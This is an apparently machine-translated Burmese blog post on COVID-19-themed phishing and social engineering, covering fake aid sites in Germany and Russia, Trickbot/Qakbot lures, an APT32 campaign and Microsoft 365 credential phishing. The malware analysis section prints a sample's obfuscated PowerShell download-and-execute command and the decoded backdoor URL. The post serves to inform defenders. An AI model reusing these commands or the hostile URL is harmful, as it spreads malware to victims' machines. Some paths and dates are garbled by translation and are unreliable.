ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

တိုက်ခိုက်သူမျာသသည် COVID-19 ခေါင်သစဉ်ကို ဆက်လက်အသုံသချကာ ကပ်ရောဂါနဟင့်ပတ်သက်သည့်အရာအာသလုံသကို စိတ်ပါဝင်စာသသော သုံသစလဲသူမျာသအတလက် ခဌိမ်သခဌောက်မဟုမျာသ ပိုမျာသလာစေသည်။ IN နောက်ဆုံသပို့စ် ကိုရိုနာဗိုင်သရပ်နောက်ပိုင်သ ဘယ်လို malware အမျိုသအစာသတလေပေါ်လာလဲဆိုတာကို ကျလန်တော်တို့ပဌောထာသပဌီသသာသဖဌစ်ပဌီသ၊ ဒီနေ့မဟာတော့ ရုရဟာသအပါအဝင် နိုင်ငံအသီသသီသက သုံသစလဲသူတလေကဌုံတလေ့ခဲ့ရတဲ့ လူမဟုအင်ဂျင်နီယာနည်သပညာတလေအကဌောင်သ ဆလေသနလေသသလာသမဟာပါ။ အထလေထလေ လမ်သကဌောင်သမျာသနဟင့် ဥပမာမျာသသည် ဖဌတ်တောက်မဟုအောက်တလင် ရဟိနေသည်။

ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

ထဲမဟာ မဟတ်ထာသပါ။ နောက်ဆုံသအချိန် လူတလေက ကိုရိုနာဗိုင်သရပ်နဲ့ ကပ်ရောဂါရဲ့လမ်သစဉ်တလေသာမက ငလေကဌေသထောက်ပံ့မဟုတလေအကဌောင်သလည်သ ဖတ်ရဟုလိုစိတ်ရဟိတယ်ဆိုတဲ့အချက်ကို ငါတို့ပဌောခဲ့ကဌတယ်။ ဒါကတော့ ဥပမာကောင်သတစ်ခုပါ။ စိတ်ဝင်စာသစရာကောင်သသော ဖဌာသယောင်သတိုက်ခိုက်မဟုကို ဂျာမန်မဌောက်ပိုင်သ Rhine-Westphalia သို့မဟုတ် NRW ပဌည်နယ်တလင် ရဟာဖလေတလေ့ရဟိခဲ့သည်။ တိုက်ခိုက်သူမျာသသည် စီသပလာသရေသဝန်ကဌီသဌာန ဝဘ်ဆိုက်၏ မိတ္တူမျာသကို ဖန်တီသခဲ့သည် (NRW စီသပလာသရေသရေသရာဝန်ကဌီသဌာန) ငလေကဌေသအကူအညီအတလက် မည်သူမဆို လျဟောက်ထာသနိုင်ပါသည်။ ထိုကဲ့သို့သောပရိုဂရမ်သည် အမဟန်တကယ်ရဟိနေပဌီသ၊ ၎င်သသည် လိမ်လည်သူမျာသအတလက် အကျိုသရဟိစေပါသည်။ သေဆုံသသူမျာသ၏ ကိုယ်ရေသကိုယ်တာအချက်အလက်မျာသကို လက်ခံရရဟိပဌီသနောက် ၎င်သတို့သည် စစ်မဟန်သောဝန်ကဌီသဌာနဝက်ဘ်ဆိုက်တလင် လျဟောက်လလဟာတင်ခဲ့သော်လည်သ အခဌာသဘဏ်အသေသစိတ်အချက်အလက်မျာသကို ဖော်ပဌခဲ့သည်။ တရာသဝင်အချက်အလက်မျာသအရ အဆိုပါအစီအစဉ်ကို မတလေ့မချင်သ ထိုသို့သော အတုအယောင်တောင်သဆိုမဟုပေါင်သ ၄ဝဝဝ ကို ပဌုလုပ်ခဲ့သည်။ ရလဒ်အနေဖဌင့် ထိခိုက်နစ်နာသူ နိုင်ငံသာသမျာသအတလက် ရည်ရလယ်ထာသသည့် ဒေါ်လာ ၁၀၉ သန်သသည် လိမ်လည်သူမျာသ၏ လက်ထဲသို့ ကျရောက်သလာသသည်။

ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

သင်သည် COVID-19 အတလက် အခမဲ့စမ်သသပ်မဟု ပဌုလုပ်လိုပါသလာသ။

coronavirus-themed phishing ၏နောက်ထပ်ထင်ရဟာသသောဥပမာမဟာ ရဟာဖလေတလေ့ရဟိခဲ့သည်။ အီသမေသလ်မျာသတလင် မက်ဆေ့ချ်မျာသသည် ကိုရိုနာဗိုင်သရပ်ကူသစက်မဟုကို အခမဲ့စစ်ဆေသမဟုခံယူရန် ကမ်သလဟမ်သချက်ဖဌင့် သုံသစလဲသူမျာသ၏ အာရုံစိုက်မဟုကို ဆလဲဆောင်ခဲ့သည်။ ဥပါဒါန်၌ စာတလေ Trickbot/Qakbot/Qbot ၏ ဥပမာမျာသ ရဟိခဲ့သည်။ ၎င်သတို့၏ကျန်သမာရေသကို စစ်ဆေသလိုသူမျာသသည် “ပူသတလဲပါဖောင်ကို ဖဌည့်စလက်” စတင်သောအခါတလင် အန္တရာယ်ရဟိသော script ကို ကလန်ပျူတာသို့ ဒေါင်သလုဒ်လုပ်ခဲ့သည်။ sandboxing စမ်သသပ်ခဌင်သကို ရဟောင်ရဟာသရန်အတလက် အကာအကလယ်စနစ်မျာသက အန္တရာယ်ရဟိသော လုပ်ဆောင်မဟုမျိုသ ဖဌစ်ပေါ်လာမည်မဟုတ်ကဌောင်သ ယုံကဌည်လာသောအခါတလင် ပင်မဗိုင်သရပ်စ်ကို script က စတင်ဒေါင်သလုဒ်လုပ်ခဲ့သည်။

Macros ကိုဖလင့်ရန် အသုံသပဌုသူအမျာသစုကို ဆလဲဆောင်ခဌင်သသည်လည်သ လလယ်ကူပါသည်။ ၎င်သကိုလုပ်ဆောင်ရန်၊ စံလဟည့်ကလက်ကိုအသုံသပဌုခဲ့သည်- မေသခလန်သလလဟာကိုဖဌည့်ရန်၊ သင်သည် ညသစလာ macros ကိုဖလင့်ရန် လိုအပ်သည်၊ ဆိုလိုသည်မဟာ သင်သည် VBA script ကို run ရန်လိုအပ်သည်။

ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

သင်တလေ့မဌင်ရသည့်အတိုင်သ၊ VBA script ကို antiviruses မျာသမဟ အထူသဖုံသကလယ်ထာသသည်။

ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

Windows တလင် အပလီကေသရဟင်သသည် ပုံသေ “Yes” အဖဌေကို လက်ခံခဌင်သမပဌုမီ /T <စက္ကန့်> စောင့်ဆိုင်သသည့် အင်္ဂါရပ်တစ်ခုရဟိသည်။ ကျလန်ုပ်တို့၏အခဌေအနေတလင်၊ ဇာတ်ညလဟန်သသည် ယာယီဖိုင်မျာသကိုမဖျက်မီ 65 စက္ကန့်စောင့်ခဲ့သည်-

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

စောင့်ဆိုင်သနေစဉ်တလင် malware ကို ဒေါင်သလုဒ်လုပ်ခဲ့သည်။ ကအတလက် အထူသ PowerShell script ကို စတင်လိုက်သည်-

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

Base64 တန်ဖိုသကို ကုဒ်ဖျက်ပဌီသနောက်၊ PowerShell script သည် ဂျာမနီမဟ ယခင်က ဟက်ခ်ခံရသော ဝဘ်ဆာဗာတလင်ရဟိသော backdoor ကို ဒေါင်သလုဒ်လုပ်သည်-

http://automatischer-staubsauger.com/feature/777777.png

အမည်အောက်တလင် သိမ်သဆည်သပါ။

C:UsersPublictmpdirfile1.exe

ဖိုငျတဟဲ ‘C:UsersPublictmpdir’ command ပါရဟိသော 'tmps1.bat' ဖိုင်ကို run သောအခါ ဖျက်ပစ်သည်။ cmd /c mkdir ""C:UsersPublictmpdir"".

အစိုသရဌာနမျာသကို ပစ်မဟတ်ထာသ တိုက်ခိုက်ခဲ့သည်။

ထို့အပဌင် FireEye လေ့လာဆန်သစစ်သူမျာသသည် Wuhan ရဟိ အစိုသရအဆောက်အညမျာသနဟင့် တရုတ် အရေသပေါ်စီမံခန့်ခလဲမဟုဝန်ကဌီသဌာနတို့ကို ရည်ရလယ်သည့် APT32 တိုက်ခိုက်မဟုကို မကဌာသေသမီက အစီရင်ခံတင်ပဌခဲ့သည်။ ဖဌန့်ဝေထာသသော RTF မျာသထဲမဟ တစ်ခုတလင် ခေါင်သစဉ်တပ်ထာသသော New York Times ဆောင်သပါသတစ်ခုသို့ လင့်ခ်တစ်ခုပါရဟိသည်။ Coronavirus တိုက်ရိုက်မလမ်သမံမဟုမျာသ- တရုတ်နိုင်ငံသည် Hubei မဟခရီသသလာသမျာသကိုခဌေရာခံနေသည်။. သို့သော် ၎င်သကိုဖတ်ပဌီသနောက်၊ malware ဒေါင်သလုဒ်လုပ်ခဲ့သည် (FireEye လေ့လာဆန်သစစ်သူမျာသသည် ယင်သကို METALJACK အဖဌစ် သတ်မဟတ်ခဲ့သည်)။

စိတ်ဝင်စာသစရာမဟာ၊ ရဟာဖလေတလေ့ရဟိသည့်အချိန်တလင်၊ Virustotal ၏အဆိုအရ ကဥပမာကို ဗိုင်သရပ်စ်ပိုသမလဟာသတစ်ခုမဟ မတလေ့ရဟိခဲ့ပါ။

ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

တရာသဝင် ဝဘ်ဆိုဒ်တလေ ပျက်တဲ့အခါ

ရုရဟာသတလင် ဖဌာသယောင်သသော တိုက်ခိုက်မဟု၏ အထူသခဌာသဆုံသ ဥပမာမဟာ မနေ့တနေ့ကပင် ဖဌစ်ခဲ့သည်။ ယင်သအတလက် အကဌောင်သရင်သမဟာ အသက် ၃ နဟစ်မဟ ၁၆ နဟစ်ကဌာသ ကလေသမျာသအတလက် နဟစ်ရဟည်လမျာသ စောင့်မျဟော်ခဲ့သော အကျိုသခံစာသခလင့်ကို ခန့်အပ်ရခဌင်သ ဖဌစ်သည်။ လျဟောက်လလဟာမျာသလက်ခံခဌင်သကို မေလ 3 ရက်၊ 16 တလင်ကဌေငဌာသောအခါ သန်သပေါင်သမျာသစလာသည် ကာလကဌာရဟည်စောင့်ဆိုင်သခဲ့ရသောအကူအညီအတလက် State Services ဝဘ်ဆိုက်သို့ အပဌေသအလလဟာသရောက်ရဟိလာကဌပဌီသ ပရော်ဖက်ရဟင်နယ် DDoS တိုက်ခိုက်မဟုထက် ပိုဆိုသခဌင်သမရဟိသော portal ကို ဖဌုတ်ချခဲ့သည်။ “အစိုသရ၀န်ဆောင်မဟုမျာသသည် လျဟောက်လလဟာစီသဆင်သမဟုကို ထိန်သကျောင်သနိုင်မည်မဟုတ်” ဟု သမ္မတက ပဌောကဌာသသောအခါတလင် လူမျာသသည် လျဟောက်လလဟာလက်ခံခဌင်သအတလက် အစာသထိုသဆိုက်တစ်ခု စတင်ခဌင်သအကဌောင်သ အလန်လိုင်သတလင် ပဌောဆိုလာကဌသည်။

ကိုရိုနာဗိုင်သရပ်ဆိုက်ဘာတိုက်ခိုက်မဟု- အချက်တစ်ခုလုံသသည် လူမဟုရေသအင်ဂျင်နီယာတလင်ဖဌစ်သည်။

ပဌဿနာမဟာ ဆိုက်မျာသစလာသည် တစ်ပဌိုင်နက်တည်သ စတင်လုပ်ဆောင်နေပဌီသ တစ်ခုဖဌစ်သည့် posobie16.gosuslugi.ru တလင် အမဟန်တကယ် အက်ပ်လီကေသရဟင်သမျာသကို အမဟန်တကယ် လက်ခံနေချိန်တလင်၊ ယုံလလယ်သောအသုံသပဌုသူမျာသ၏ ကိုယ်ရေသကိုယ်တာအချက်အလက်မျာသကို ဒါဇင်ပေါင်သမျာသစလာက စုဆောင်သသည်။.

SearchInform မဟလုပ်ဖော်ကိုင်ဖက်မျာသသည် .ru ဇုန်ရဟိ လိမ်လည်သောဒိုမိန်သအသစ် 30 ခန့်ကို တလေ့ရဟိခဲ့သည်။ Infosecurity နဟင့် Softline ကုမ္ပဏီတို့သည် ဧပဌီလအစကတည်သက အလာသတူ အစိုသရဝန်ဆောင်မဟု ၀က်ဘ်ဆိုဒ် ၇၀ ကျော်ကို ခဌေရာခံခဲ့သည်။ ၎င်သတို့၏ဖန်တီသသူမျာသသည် ရင်သနဟီသသောသင်္ကေတမျာသကို ခဌယ်လဟယ်ပဌီသ gosuslugi၊ gosuslugi-70၊ vyplaty၊ covid-vyplaty၊ posobie စသည်ဖဌင့် စကာသလုံသမျာသကို ပေါင်သစပ်အသုံသပဌုပါသည်။

Hype နဟင့်လူမဟုရေသအင်ဂျင်နီယာ

ကနမူနာမျာသအာသလုံသသည် တိုက်ခိုက်သူမျာသသည် coronavirus ၏အကဌောင်သအရာကို အောင်မဌင်စလာငလေရဟာနေကဌောင်သ အတည်ပဌုရုံသာဖဌစ်သည်။ လူမဟုရေသတင်သမာမဟု မဌင့်မာသလေနဟင့် မရဟင်သလင်သသော ပဌဿနာမျာသ ပိုမျာသလေလေ၊ လိမ်လည်လဟည့်ဖဌာသသူမျာသသည် အရေသကဌီသသော ဒေတာကို ခိုသယူရန်၊ လူမျာသအာသ ၎င်သတို့၏ ပိုက်ဆံကို ၎င်သတို့ကိုယ်တိုင် စလန့်လလဟတ်ရန် အတင်သအကျပ်ခိုင်သစေခဌင်သ သို့မဟုတ် ကလန်ပဌူတာမျာသကို ဟက်ခ်လုပ်ရန် အခလင့်အလမ်သ ပိုမျာသလေလေဖဌစ်သည်။

ကပ်ရောဂါကဌောင့် ကဌိုတင်ပဌင်ဆင်ထာသခဌင်သမရဟိသော လူမျာသကို အိမ်တလင်သမဟ အလုပ်ခိုင်သစေခဌင်သဖဌင့် ကိုယ်ရေသကိုယ်တာသာမက ကော်ပိုရိတ်ဒေတာကိုပါ အန္တရာယ်ဖဌစ်စေပါသည်။ ဥပမာအာသဖဌင့်၊ မကဌာသေသမီက Microsoft 365 (ယခင် Office 365) အသုံသပဌုသူမျာသသည်လည်သ phishing တိုက်ခိုက်မဟုကို ခံခဲ့ရသည်။ လူမျာသသည် ကဌီသမာသသော "လလတ်သလာသသည်" အသံမက်ဆေ့ဂျ်မျာသကို စာမျာသနဟင့်တလဲဆက်မဟုအဖဌစ် လက်ခံရရဟိခဲ့သည်။ သို့ရာတလင်၊ ဖိုင်မျာသသည် အမဟန်တကယ်အာသဖဌင့် တိုက်ခိုက်ခံရသူမျာသထံသို့ ပေသပို့သော HTML စာမျက်နဟာတစ်ခုဖဌစ်သည်။ Microsoft 365 လက်မဟတ်ထိုသဝင်သည့် စာမျက်နဟာအတု. ရလဒ်အနေဖဌင့်၊ အကောင့်မဟဒေတာအာသလုံသကိုဝင်ရောက်ခလင့်ဆုံသရဟုံသခဌင်သနဟင့်အပေသအယူလုပ်ပါ။

source: www.habr.com

မဟတ်ချက် Add